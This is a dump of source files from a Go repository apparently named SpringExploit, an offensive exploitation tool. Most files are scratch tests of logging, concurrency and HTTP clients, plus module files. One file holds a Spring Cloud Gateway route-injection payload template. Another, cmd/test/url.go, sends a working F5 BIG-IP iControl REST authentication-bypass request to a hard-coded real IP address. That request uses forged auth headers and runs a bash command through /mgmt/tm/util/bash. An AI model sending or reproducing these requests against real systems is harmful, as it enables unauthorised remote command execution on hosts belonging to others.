//TimestampFormat: "2006-01-02 15:04:05", 47 | } 48 | 49 | log.SetFormatter(&format) 50 | log.SetReportCaller(true) 51 | log.Debugln("Saving logs to file " + logfile) 52 | } else { 53 | log.Info("Failed to log to file, using default stderr") 54 | } 55 | 56 | } 57 | 58 | } 59 | -------------------------------------------------------------------------------- /cmd/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "github.com/SummerSec/SpringExploit/cmd/commons/core" 5 | log "github.com/sirupsen/logrus" 6 | ) 7 | 8 | func main() { 9 | options := core.ParseOptions() 10 | 11 | //if options.Url != "" { 12 | // 13 | //} else if options.File != "" { 14 | //} else if options.IP != "" { 15 | //} else if options.SP { 16 | // return 17 | //} else { 18 | // log.Info("No url, file or ip specified") 19 | // return 20 | //} 21 | 22 | r, _ := core.NewRunner(options) 23 | //log.Errorf("Error: %s", err) 24 | 25 | r.Run() 26 | log.Info("SpringExploit finished") 27 | } 28 | -------------------------------------------------------------------------------- /cmd/test/FileWriter.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "path/filepath" 7 | ) 8 | 9 | func main() { 10 | f, _ := filepath.Abs("G:\\GitHubProject\\SpringExploit\\logs\\test.txt") 11 | b := filepath.Base(f) 12 | p := filepath.Dir(f) 13 | fmt.Println(b) 14 | fmt.Println(p) 15 | utils.SaveToFile("test.txt\n", "logs\\test.txt") 16 | 17 | } 18 | -------------------------------------------------------------------------------- /cmd/test/Strings.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "strings" 7 | ) 8 | 9 | func main() { 10 | hashmap := map[string]interface{}{ 11 | "foo": "bar", 12 | } 13 | v := hashmap["foo"].(string) 14 | fmt.Println("%v", v) 15 | mem := "asdasd%sqweqweqwe" 16 | a := fmt.Sprintf(mem, "1231asdasd") 17 | payload := "{\n \"id\": \"%s\",\n \"filters\": [{\n \"name\": \"AddResponseHeader\",\n \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n }],\n \"uri\": \"http://example.com\",\n \"order\": 0\n}" 18 | 19 | fmt.Println(a) 20 | t := fmt.Sprintf(payload, utils.GetCode(5), a) 21 | 22 | fmt.Println(t) 23 | 24 | b := "asd<%s>123->asd<%s>asda" 25 | c := fmt.Sprintf(b, "qaz", "qwe") 26 | fmt.Println(c) 27 | 28 | d := "" 29 | ds := strings.Split(d, ",") 30 | fmt.Println(ds) 31 | 32 | y := utils.EncodeString("asdasd") 33 | fmt.Println(y) 34 | 35 | } 36 | -------------------------------------------------------------------------------- /cmd/test/ants.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "github.com/panjf2000/ants/v2" 6 | "sync" 7 | "time" 8 | ) 9 | 10 | func Task() { 11 | fmt.Println(fmt.Sprintf("%d %s", time.Now().Nanosecond(), "Hello, World!")) 12 | time.Sleep(time.Second * 2) 13 | 14 | } 15 | 16 | func main() { 17 | defer ants.Release() 18 | pool, err := ants.NewPool(50) 19 | if err != nil { 20 | fmt.Println(err) 21 | return 22 | } 23 | var wg sync.WaitGroup 24 | 25 | task := func() { 26 | Task() 27 | wg.Done() 28 | } 29 | 30 | for i := 0; i < 100; i++ { 31 | wg.Add(1) 32 | fmt.Println(fmt.Sprintf("%d %s", i, "before submit")) 33 | _ = pool.Submit(task) 34 | } 35 | wg.Wait() 36 | 37 | } 38 | -------------------------------------------------------------------------------- /cmd/test/checkerr.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "fmt" 4 | 5 | func getErr(int1, int2 int) error { 6 | defer func() { 7 | if err := recover(); err != nil { 8 | fmt.Println(err) 9 | } 10 | }() 11 | _ = int1 / int2 12 | return nil 13 | } 14 | 15 | func main() { 16 | defer func() { 17 | if err := recover(); err != nil { 18 | fmt.Println(err) 19 | } 20 | }() 21 | _ = getErr(1, 0) 22 | fmt.Println("Hello, playground") 23 | 24 | } 25 | -------------------------------------------------------------------------------- /cmd/test/copymap.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "github.com/imroc/req/v3" 6 | log "github.com/sirupsen/logrus" 7 | "time" 8 | ) 9 | 10 | func main() { 11 | 12 | rsp := req.C().SetRedirectPolicy(req.NoRedirectPolicy()).SetTimeout(3 * time.Second).EnableDebugLog() 13 | rsp.SetLogger(log.StandardLogger()) 14 | rsp.EnableInsecureSkipVerify() 15 | resp, _ := rsp.R().Send("GET", "https://sumsec.me/ads.txt") 16 | resp.IsSuccess() 17 | fmt.Println(resp.StatusCode) 18 | fmt.Println(resp.Header.Values("Content-Type")) 19 | fmt.Println(resp.Header.Get("Content-Type")) 20 | fmt.Println(resp.Dump()) 21 | 22 | } 23 | -------------------------------------------------------------------------------- /cmd/test/dnslog.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | log "github.com/sirupsen/logrus" 7 | ) 8 | 9 | func main() { 10 | dnslog := &utils.Dnslog{} 11 | dnslog.SetPre("dns") 12 | dnslog.SetId("dnslog") 13 | f := dnslog.GetDnslog() 14 | fmt.Println(dnslog.Id()) 15 | log.Debugf("id: ", dnslog.Id) 16 | fmt.Println(f) 17 | 18 | } 19 | -------------------------------------------------------------------------------- /cmd/test/emun.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "github.com/imroc/req/v3" 7 | "runtime" 8 | ) 9 | 10 | func main() { 11 | u := "https://api.github.com/repos/SummerSec/SpringExploit/releases/latest" 12 | fmt.Println(u) 13 | resp, _ := req.C().DevMode().R().Head(u) 14 | fmt.Println(resp.Result()) 15 | body, _ := resp.ToString() 16 | // body to map 17 | fmt.Println(body) 18 | var m map[string]interface{} 19 | json.Unmarshal([]byte(body), &m) 20 | // get release tag 21 | tag := m["tag_name"] 22 | 23 | fmt.Println(tag) 24 | fmt.Println(runtime.GOOS + "_" + runtime.GOARCH) 25 | 26 | } 27 | -------------------------------------------------------------------------------- /cmd/test/header.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | func main() { 9 | hashmap := map[string]string{ 10 | "foo": "bar", 11 | "baz": "qux", 12 | } 13 | header := make(http.Header) 14 | for k, v := range hashmap { 15 | header[k] = []string{v} 16 | } 17 | req, _ := http.NewRequest("GET", "http://sumsec.me", nil) 18 | req.Header = header 19 | resp, _ := http.DefaultClient.Do(req) 20 | fmt.Println(resp) 21 | 22 | } 23 | -------------------------------------------------------------------------------- /cmd/test/headurl.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "github.com/imroc/req/v3" 6 | ) 7 | 8 | func main() { 9 | u := "https://sumsec.me/" 10 | rsp, _ := req.R().EnableDump().Get(u) 11 | //res := rsp.Dump() 12 | fmt.Println(rsp.Dump()) 13 | // 从res中获取headers 14 | fmt.Println(rsp.Header.Get("Content-Type")) 15 | 16 | } 17 | -------------------------------------------------------------------------------- /cmd/test/interface/demo.go: -------------------------------------------------------------------------------- 1 | package _interface 2 | 3 | import "github.com/imroc/req/v3" 4 | 5 | type Demo interface { 6 | Foo(response req.Response) 7 | Koo() 8 | } 9 | -------------------------------------------------------------------------------- /cmd/test/interface/demo/test.go: -------------------------------------------------------------------------------- 1 | package demo 2 | -------------------------------------------------------------------------------- /cmd/test/interface/demo1.go: -------------------------------------------------------------------------------- 1 | package _interface 2 | 3 | type Demo1 struct { 4 | Name string 5 | } 6 | -------------------------------------------------------------------------------- /cmd/test/interface/test1.go: -------------------------------------------------------------------------------- 1 | package _interface 2 | 3 | import "github.com/imroc/req/v3" 4 | 5 | type test1 struct{} 6 | 7 | func (test1) Foo(response req.Response) { 8 | //TODO implement me 9 | panic("implement me") 10 | } 11 | -------------------------------------------------------------------------------- /cmd/test/ip.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "strings" 6 | ) 7 | 8 | func main() { 9 | str := "http://example.com/\r\n" 10 | u1 := "http://example.com\n" 11 | u2 := "http://example.com\r" 12 | //如果字符串存在\r或者\n,那么去掉这个\r或者\n 13 | // 如果str结尾存在\r\n,则去掉 14 | if strings.HasSuffix(str, "\r") { 15 | str = strings.TrimSuffix(str, "\r\n") 16 | } 17 | // 如果str结尾存在\n,则去掉 18 | if strings.HasSuffix(str, "\n") { 19 | str = strings.TrimSuffix(str, "\n") 20 | } 21 | println(str) 22 | 23 | println(u1) 24 | println(u2) 25 | 26 | // get the current directory 27 | dir, err := os.Getwd() 28 | if err != nil { 29 | panic(err) 30 | } 31 | println(dir) 32 | 33 | // get current executable path 34 | executable, err := os.Executable() 35 | if err != nil { 36 | } 37 | println(executable) 38 | 39 | d, err := os.Stat("SpringExploit.exe") 40 | if err != nil { 41 | 42 | } 43 | println(d.Name()) 44 | 45 | } 46 | -------------------------------------------------------------------------------- /cmd/test/prompt.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "github.com/c-bata/go-prompt" 5 | log "github.com/sirupsen/logrus" 6 | ) 7 | 8 | func completer(d prompt.Document) []prompt.Suggest { 9 | s := []prompt.Suggest{ 10 | {Text: "id", Description: "you can type command {id}"}, 11 | } 12 | return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true) 13 | } 14 | 15 | func main() { 16 | log.Info("Starting prompt") 17 | t := prompt.Input("> ", completer) 18 | log.Info("you type: ", t) 19 | } 20 | -------------------------------------------------------------------------------- /cmd/test/test.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | ) 6 | 7 | type T struct { 8 | A int 9 | B string 10 | } 11 | 12 | func (t T) toString() interface{} { 13 | return t 14 | } 15 | 16 | func main() { 17 | 18 | urls := []string{"http://golang.org", "http://godoc.org", "http://play.golang.org", "http://gopl.io", "http://golang.org"} 19 | 20 | i := 0 21 | k := 3 22 | for i < len(urls) { 23 | for j := 0; j < k; j++ { 24 | if i == len(urls) { 25 | break 26 | } 27 | c := make(chan int) 28 | go say(urls[i], i, c) 29 | i = <-c 30 | } 31 | } 32 | 33 | } 34 | 35 | func say(url string, i int, c chan int) { 36 | fmt.Println(url) 37 | i++ 38 | c <- i 39 | 40 | } 41 | -------------------------------------------------------------------------------- /cmd/test/test1.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "github.com/fatih/structs" 7 | ) 8 | 9 | // UserInfo 用户信息 10 | type UserInfo struct { 11 | Name string 12 | Age int 13 | } 14 | 15 | type User struct { 16 | UserInfo UserInfo 17 | } 18 | 19 | func (i UserInfo) toString() interface{} { 20 | return i 21 | } 22 | 23 | func main() { 24 | u1 := UserInfo{Name: "q1mi", Age: 18} 25 | m := structs.Map(&u1) 26 | for k, v := range m { 27 | fmt.Printf("key:%v value:%v value type:%T\n", k, v, v) 28 | } 29 | 30 | fmt.Println(u1.toString()) 31 | datatype, _ := json.Marshal(u1) 32 | fmt.Println("map to string : " + string(datatype)) 33 | u2 := User{UserInfo: u1} 34 | m2 := structs.Map(&u2.UserInfo) 35 | for k, v := range m2 { 36 | fmt.Printf("key:%v value:%v value type:%T\n", k, v, v) 37 | } 38 | fmt.Println(u2.UserInfo.toString()) 39 | 40 | //m3 := u1.toMap() 41 | //for k, v := range m3.(map[string]interface{}) { 42 | // fmt.Printf("key:%v value:%v value type:%T\n", k, v, v) 43 | //} 44 | } 45 | -------------------------------------------------------------------------------- /cmd/test/threads.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "strconv" 6 | "sync" 7 | ) 8 | 9 | func hello(str int) { 10 | i := strconv.Itoa(str) 11 | fmt.Println("Hello, world." + i) 12 | 13 | } 14 | 15 | func main() { 16 | var wg sync.WaitGroup 17 | 18 | for i := 0; i < 100; i++ { 19 | wg.Add(1) 20 | fmt.Println("Starting goroutine", i) 21 | go func() { 22 | hello(i) 23 | wg.Done() 24 | }() 25 | } 26 | wg.Wait() 27 | } 28 | -------------------------------------------------------------------------------- /cmd/test/url.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "github.com/imroc/req/v3" 6 | ) 7 | 8 | func main() { 9 | url := "http://139.162.180.108:7500" 10 | client := req.C() 11 | client.SetTimeout(10 * 1000) 12 | client.SetCommonRetryCount(3) 13 | client.EnableInsecureSkipVerify() 14 | headers := map[string]string{ 15 | "Host": "localhost", 16 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 17 | //"Connection": "keep-alive, x-f5-auTh-tOKen, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host", 18 | "Connection": "keep-alive, x-f5-auTh-tOKen", 19 | "Authorization": "Basic YWRtaW46", 20 | "X-F5-Auth-Token": "a", 21 | "Content-Type": "application/json", 22 | } 23 | resp, _ := client.R().SetHeadersNonCanonical(headers).SetBody("{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo SnZQYURpdk9lVQ== | base64 -d'\"}").Post(url + "/mgmt/tm/util/bash") 24 | fmt.Println(resp.Dump()) 25 | 26 | } 27 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/SummerSec/SpringExploit 2 | 3 | go 1.13 4 | 5 | require ( 6 | github.com/corpix/uarand v0.1.1 7 | github.com/fatih/structs v1.1.0 8 | github.com/imroc/req/v3 v3.13.1 9 | github.com/projectdiscovery/mapcidr v0.0.9 10 | github.com/sirupsen/logrus v1.8.1 11 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c // indirect 12 | 13 | ) 14 | 15 | require ( 16 | //github.com/apex/log v1.9.0 // indirect 17 | github.com/blang/semver v3.5.1+incompatible 18 | github.com/c-bata/go-prompt v0.2.6 19 | //github.com/c4milo/unpackit v0.1.0 // indirect 20 | //github.com/google/go-github v17.0.0+incompatible // indirect 21 | github.com/google/go-querystring v1.1.0 // indirect 22 | //github.com/gosuri/uilive v0.0.4 // indirect 23 | //github.com/gosuri/uiprogress v0.0.1 // indirect 24 | github.com/panjf2000/ants/v2 v2.5.0 25 | github.com/projectdiscovery/stringsutil v0.0.0-20210804142656-fd3c28dbaafe 26 | github.com/rhysd/go-github-selfupdate v1.2.3 27 | golang.org/x/text v0.3.7 28 | //github.com/tj/go-update v2.2.5-0.20200519121640-62b4b798fd68+incompatible 29 | ) 30 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/Masterminds/glide v0.13.2/go.mod h1:STyF5vcenH/rUqTEv+/hBXlSTo7KYwg2oc2f4tzPWic= 2 | github.com/Masterminds/semver v1.4.2/go.mod h1:MB6lktGJrhw8PrUyiEoblNEGEQ+RzHPF078ddwwvV3Y= 3 | github.com/Masterminds/vcs v1.13.0/go.mod h1:N09YCmOQr6RLxC6UNHzuVwAdodYbbnycGHSmwVJjcKA= 4 | github.com/blang/semver v3.5.1+incompatible h1:cQNTCjp13qL8KC3Nbxr/y2Bqb63oX6wdnnjpJbkM4JQ= 5 | github.com/blang/semver v3.5.1+incompatible/go.mod h1:kRBLl5iJ+tD4TcOOxsy/0fnwebNt5EWlYSAyrTnjyyk= 6 | github.com/c-bata/go-prompt v0.2.6 h1:POP+nrHE+DfLYx370bedwNhsqmpCUynWPxuHi0C5vZI= 7 | github.com/c-bata/go-prompt v0.2.6/go.mod h1:/LMAke8wD2FsNu9EXNdHxNLbd9MedkPnCdfpU9wwHfY= 8 | github.com/cnf/structhash v0.0.0-20201127153200-e1b16c1ebc08/go.mod h1:pCxVEbcm3AMg7ejXyorUXi6HQCzOIBf7zEDVPtw0/U4= 9 | github.com/codegangsta/cli v1.20.0/go.mod h1:/qJNoX69yVSKu5o4jLyXAENLRyk1uhi7zkbQ3slBdOA= 10 | github.com/corpix/uarand v0.1.1 h1:RMr1TWc9F4n5jiPDzFHtmaUXLKLNUFK0SgCLo4BhX/U= 11 | github.com/corpix/uarand v0.1.1/go.mod h1:SFKZvkcRoLqVRFZ4u25xPmp6m9ktANfbpXZ7SJ0/FNU= 12 | github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E= 13 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 14 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 15 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 16 | github.com/fatih/structs v1.1.0 h1:Q7juDM0QtcnhCpeyLGQKyg4TOIghuNXrkL32pHAUMxo= 17 | github.com/fatih/structs v1.1.0/go.mod h1:9NiDSp5zOcgEDl+j00MP/WkGVPOlPRLejGD8Ga6PJ7M= 18 | github.com/fsnotify/fsnotify v1.4.7 h1:IXs+QLmnXW2CcXuY+8Mzv/fWEsPGWxqefPtCP5CnV9I= 19 | github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo= 20 | github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= 21 | github.com/golang/protobuf v1.3.2 h1:6nsPYzhq5kReh6QImI3k5qWzO4PEbvbIW2cwSfR/6xs= 22 | github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= 23 | github.com/golang/snappy v0.0.0-20180518054509-2e65f85255db/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= 24 | github.com/golang/snappy v0.0.3/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= 25 | github.com/google/go-cmp v0.5.2 h1:X2ev0eStA3AbceY54o37/0PQ/UWqKEiiO2dKL5OPaFM= 26 | github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 27 | github.com/google/go-github/v30 v30.1.0 h1:VLDx+UolQICEOKu2m4uAoMti1SxuEBAl7RSEG16L+Oo= 28 | github.com/google/go-github/v30 v30.1.0/go.mod h1:n8jBpHl45a/rlBUtRJMOG4GhNADUQFEufcolZ95JfU8= 29 | github.com/google/go-querystring v1.0.0/go.mod h1:odCYkC5MyYFN7vkCjXpyrEuKhc/BUO6wN/zVPAxq5ck= 30 | github.com/google/go-querystring v1.1.0 h1:AnCroh3fv4ZBgVIf1Iwtovgjaw/GiKJo8M8yD/fhyJ8= 31 | github.com/google/go-querystring v1.1.0/go.mod h1:Kcdr2DB4koayq7X8pmAG4sNG59So17icRSOU623lUBU= 32 | github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= 33 | github.com/hashicorp/errwrap v1.0.0 h1:hLrqtEDnRye3+sgx6z4qVLNuviH3MR5aQ0ykNJa/UYA= 34 | github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4= 35 | github.com/hashicorp/go-multierror v1.1.1 h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo= 36 | github.com/hashicorp/go-multierror v1.1.1/go.mod h1:iw975J/qwKPdAO1clOe2L8331t/9/fmwbPZ6JB6eMoM= 37 | github.com/hpcloud/tail v1.0.0 h1:nfCOvKYfkgYP8hkirhJocXT2+zOD8yUNjXaWfTlyFKI= 38 | github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU= 39 | github.com/imroc/req/v3 v3.11.2 h1:21T0t1sZTJ04e0tMOEMmH3z66V3opRH8LO5lss3Sv3c= 40 | github.com/imroc/req/v3 v3.11.2/go.mod h1:G6fkq27P+JcTcgRVxecxY+amHN1xFl8W81eLCfJ151M= 41 | github.com/imroc/req/v3 v3.13.1 h1:kgqEyBkuZQ4Fbv5M2sC0v6Sov9Ne4JurYmziRphvpHU= 42 | github.com/imroc/req/v3 v3.13.1/go.mod h1:G6fkq27P+JcTcgRVxecxY+amHN1xFl8W81eLCfJ151M= 43 | github.com/inconshreveable/go-update v0.0.0-20160112193335-8152e7eb6ccf h1:WfD7VjIE6z8dIvMsI4/s+1qr5EL+zoIGev1BQj1eoJ8= 44 | github.com/inconshreveable/go-update v0.0.0-20160112193335-8152e7eb6ccf/go.mod h1:hyb9oH7vZsitZCiBt0ZvifOrB+qc8PS5IiilCIb87rg= 45 | github.com/json-iterator/go v1.1.10/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= 46 | github.com/json-iterator/go v1.1.11/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= 47 | github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= 48 | github.com/kr/pretty v0.2.1 h1:Fmg33tUaq4/8ym9TJN1x7sLJnHVwhP33CNkpYV/7rwI= 49 | github.com/kr/pretty v0.2.1/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI= 50 | github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= 51 | github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= 52 | github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY= 53 | github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE= 54 | github.com/logrusorgru/aurora v0.0.0-20200102142835-e9ef32dff381/go.mod h1:7rIyQOR62GCctdiQpZ/zOJlFyk6y+94wXzv6RNZgaR4= 55 | github.com/logrusorgru/aurora v2.0.3+incompatible/go.mod h1:7rIyQOR62GCctdiQpZ/zOJlFyk6y+94wXzv6RNZgaR4= 56 | github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= 57 | github.com/mattn/go-colorable v0.1.7 h1:bQGKb3vps/j0E9GfJQ03JyhRuxsvdAanXlT9BTw3mdw= 58 | github.com/mattn/go-colorable v0.1.7/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= 59 | github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= 60 | github.com/mattn/go-isatty v0.0.10/go.mod h1:qgIWMr58cqv1PHHyhnkY9lrL7etaEgOFcMEpPG5Rm84= 61 | github.com/mattn/go-isatty v0.0.12 h1:wuysRhFDzyxgEmMf5xjvJ2M9dZoWAXNNr5LSBS7uHXY= 62 | github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= 63 | github.com/mattn/go-runewidth v0.0.6/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= 64 | github.com/mattn/go-runewidth v0.0.9 h1:Lm995f3rfxdpd6TSmuVCHVb/QhupuXlYr8sCI/QdE+0= 65 | github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= 66 | github.com/mattn/go-tty v0.0.3 h1:5OfyWorkyO7xP52Mq7tB36ajHDG5OHrmBGIS/DtakQI= 67 | github.com/mattn/go-tty v0.0.3/go.mod h1:ihxohKRERHTVzN+aSVRwACLCeqIoZAWpoICkkvrWyR0= 68 | github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0= 69 | github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= 70 | github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= 71 | github.com/modern-go/reflect2 v0.0.0-20180701023420-4b7aa43c6742/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0= 72 | github.com/modern-go/reflect2 v1.0.1/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0= 73 | github.com/ngdinhtoan/glide-cleanup v0.2.0/go.mod h1:UQzsmiDOb8YV3nOsCxK/c9zPpCZVNoHScRE3EO9pVMM= 74 | github.com/onsi/ginkgo v1.6.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE= 75 | github.com/onsi/ginkgo v1.7.0 h1:WSHQ+IS43OoUrWtD1/bbclrwK8TTH5hzp+umCiuxHgs= 76 | github.com/onsi/ginkgo v1.7.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE= 77 | github.com/onsi/gomega v1.4.2/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY= 78 | github.com/onsi/gomega v1.4.3 h1:RE1xgDvH7imwFD45h+u2SgIfERHlS2yNG4DObb5BSKU= 79 | github.com/onsi/gomega v1.4.3/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY= 80 | github.com/panjf2000/ants/v2 v2.5.0 h1:1rWGWSnxCsQBga+nQbA4/iY6VMeNoOIAM0ZWh9u3q2Q= 81 | github.com/panjf2000/ants/v2 v2.5.0/go.mod h1:cU93usDlihJZ5CfRGNDYsiBYvoilLvBF5Qp/BT2GNRE= 82 | github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= 83 | github.com/pkg/term v1.2.0-beta.2 h1:L3y/h2jkuBVFdWiJvNfYfKmzcCnILw7mJWm2JQuMppw= 84 | github.com/pkg/term v1.2.0-beta.2/go.mod h1:E25nymQcrSllhX42Ok8MRm1+hyBdHY0dCeiKZ9jpNGw= 85 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 86 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 87 | github.com/projectdiscovery/blackrock v0.0.0-20210415162320-b38689ae3a2e h1:7bwaFH1jvtOo5ndhTQgoA349ozhX+1dc4b6tbaPnBOA= 88 | github.com/projectdiscovery/blackrock v0.0.0-20210415162320-b38689ae3a2e/go.mod h1:/IsapnEYiWG+yEDPXp0e8NWj3npzB9Ccy9lXEUJwMZs= 89 | github.com/projectdiscovery/goflags v0.0.7/go.mod h1:Jjwsf4eEBPXDSQI2Y+6fd3dBumJv/J1U0nmpM+hy2YY= 90 | github.com/projectdiscovery/gologger v1.0.1/go.mod h1:Ok+axMqK53bWNwDSU1nTNwITLYMXMdZtRc8/y1c7sWE= 91 | github.com/projectdiscovery/gologger v1.1.4/go.mod h1:Bhb6Bdx2PV1nMaFLoXNBmHIU85iROS9y1tBuv7T5pMY= 92 | github.com/projectdiscovery/hmap v0.0.1/go.mod h1:VDEfgzkKQdq7iGTKz8Ooul0NuYHQ8qiDs6r8bPD1Sb0= 93 | github.com/projectdiscovery/ipranger v0.0.2/go.mod h1:kcAIk/lo5rW+IzUrFkeYyXnFJ+dKwYooEOHGVPP/RWE= 94 | github.com/projectdiscovery/mapcidr v0.0.4/go.mod h1:ALOIj6ptkWujNoX8RdQwB2mZ+kAmKuLJBq9T5gR5wG0= 95 | github.com/projectdiscovery/mapcidr v0.0.9 h1:PIa09fMHdghlmkUeTgHP9bwYnb3k2wXXM2f6LMj26zg= 96 | github.com/projectdiscovery/mapcidr v0.0.9/go.mod h1:zgsrc+UXwcLcBopUNboiI4tpTICbfdTyJZiBi2tx+NI= 97 | github.com/projectdiscovery/stringsutil v0.0.0-20210804142656-fd3c28dbaafe h1:tQTgf5XLBgZbkJDPtnV3SfdP9tzz5ZWeDBwv8WhnH9Q= 98 | github.com/projectdiscovery/stringsutil v0.0.0-20210804142656-fd3c28dbaafe/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I= 99 | github.com/rhysd/go-github-selfupdate v1.2.3 h1:iaa+J202f+Nc+A8zi75uccC8Wg3omaM7HDeimXA22Ag= 100 | github.com/rhysd/go-github-selfupdate v1.2.3/go.mod h1:mp/N8zj6jFfBQy/XMYoWsmfzxazpPAODuqarmPDe2Rg= 101 | github.com/sirupsen/logrus v1.8.1 h1:dJKuHgqk1NNQlqoA6BTlM1Wf9DOH3NBjQyu0h9+AZZE= 102 | github.com/sirupsen/logrus v1.8.1/go.mod 